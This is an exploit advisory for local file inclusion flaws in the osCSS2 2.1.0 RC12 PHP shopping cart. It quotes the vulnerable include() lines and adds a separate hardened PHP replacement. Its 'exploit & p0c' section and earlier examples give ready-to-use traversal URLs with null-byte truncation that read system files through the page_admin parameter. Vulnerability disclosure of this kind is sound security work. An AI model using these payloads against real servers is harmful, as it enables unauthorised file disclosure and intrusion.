===================================================================
    osCSS2 2.1.0 RC12 Multiple Local File Inclusion Vulnerabilities
===================================================================
    
Software:   osCSS2 2.1.0 RC12
Vendor:     http://www.oscss.org/
Vuln Type:  Local File Inclusion
Download link:  http://sourceforge.net/projects/oscss/files%2Foscss-2%2FosCSS 2.1. Final%2FosCSS2_2.1.0_preRC12.zip/download
Author:     eidelweiss
contact:    eidelweiss[at]windowslive[dot]com
Home:       www.eidelweiss.info
 
Gratz: welcome back YOGYACARDERLINK.web.id !!!
    
References: http://eidelweiss-advisories.blogspot.com/2011/03/oscss2-210-rc12-multiple-local-file.html
    
    
===================================================================
  
    description:
osCSS is a PHP e-commerce shopping program, built on a foundation of osCommerce GPL code.
This version brings the script up to web standards, using XHTML 1.1 Strict as the markup language and CSS for layout presentation.
----------------------------------
    Vulnerability Details:
  
Some vulnerabilities in this version have already been discovered by John Leitch (AutoSec Tools) and can be exploited via the browser (XSS & LFI):

http://www.exploit-db.com/exploits/17069/

http://localhost/oscss2/admin108/index.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
 
http://localhost/oscss2/admin108/popup_image.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00


-----------------------------------

Here is more vulnerable code I found there:

[!] admin/includes/template/oscss/gabarit-view.php
[!] admin/includes/template/defaut/gabarit-view.php


*/

$css=($_GET['forceview']=='print')? 'print' : 'view' ;
$CHARSET=(isset($_GET['forcecharset']))?$_GET['forcecharset'] : CHARSET ;
// $page_admin reaches include() with no validation at all (the PoC below supplies it
// as the page_admin GET parameter); the leading '@' also hides the warning a failed
// include would otherwise log.
@include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
require(DIR_WS_TEMPLATE.'inc/lib.template.php');
?>

-----------------------------------

[!] admin/includes/template/oscss/gabarit-2.php

*/
    // Same unvalidated $page_admin sink as in gabarit-view.php above.
    @include(DIR_WS_INCLUDES . 'content/'.$page_admin.'.top.inc');
    require(DIR_WS_TEMPLATE.'inc/lib.template.php');
    if (($init_theme=tep_test_gab_ele('inc/init_theme')) !=false) require($init_theme);
?>
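A hardened replacement for the include line quoted in both excerpts, added here as an example and not taken from osCSS. It assumes DIR_WS_INCLUDES is the application's constant (the fallback definition is only so the file runs stand-alone) and that valid pages are the `*.top.inc` files directly under `DIR_WS_INCLUDES/content/`.

```php
<?php
// Added example, not osCSS code: a hardened replacement for the
//   @include(DIR_WS_INCLUDES . 'content/' . $page_admin . '.top.inc');
// line quoted above. DIR_WS_INCLUDES is the application's own constant; the
// fallback definition here is an assumption so this file runs stand-alone.
if (!defined('DIR_WS_INCLUDES')) {
    define('DIR_WS_INCLUDES', __DIR__ . '/includes/');
}

// Resolve a page name to its include file, or return null unless it is a plain
// page name whose file really lives inside DIR_WS_INCLUDES/content/.
function resolve_page_admin(string $candidate): ?string
{
    // Allow only an identifier: letters, digits, underscore, hyphen. This rejects
    // "../", slashes, NUL bytes and absolute paths before any filesystem access.
    if (!preg_match('/^[A-Za-z0-9_-]{1,64}$/D', $candidate)) {
        return null;
    }
    $base   = realpath(DIR_WS_INCLUDES . 'content');
    $target = realpath(DIR_WS_INCLUDES . 'content/' . $candidate . '.top.inc');
    // Defence in depth: the resolved file must exist and lie under the content dir.
    if ($base === false || $target === false
        || strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

if (PHP_SAPI === 'cli') {
    // Constructed probes: the advisory's traversal string (URL-decoded) and a plain name.
    $probes = [
        "../../../../windows/win.ini\0", // traversal plus null-byte truncation attempt
        'index',                         // plain name: accepted only if its file exists
    ];
    foreach ($probes as $p) {
        $r = resolve_page_admin($p);
        printf("%-40s => %s\n", addcslashes($p, "\0"), $r ?? 'rejected');
    }
} else {
    $page_admin = isset($_GET['page_admin']) ? (string) $_GET['page_admin'] : 'index';
    $file = resolve_page_admin($page_admin);
    if ($file === null) {
        http_response_code(400);
        exit('invalid page_admin');
    }
    include $file; // no '@': a failed include should surface in the logs, not be hidden
}
```

The null-byte truncation the PoC relies on was closed in PHP 5.3.4, but traversal without a NUL byte still works against the original line, so the identifier check and the realpath containment check above do not depend on the PHP version.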

-----------------------------------
  
    exploit & p0c
    
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    or
[!] http://host/path_to_oscss/admin/includes/template/oscss/gabarit-2.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    or
[!] http://host/path_to_oscss/admin/includes/template/defaut/gabarit-view.php?page_admin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini%00
    
====================================================================
    
    Nothing Impossible In This World Even Nobody`s Perfect
    
===================================================================
    
==========================| -=[ E0F ]=- |==========================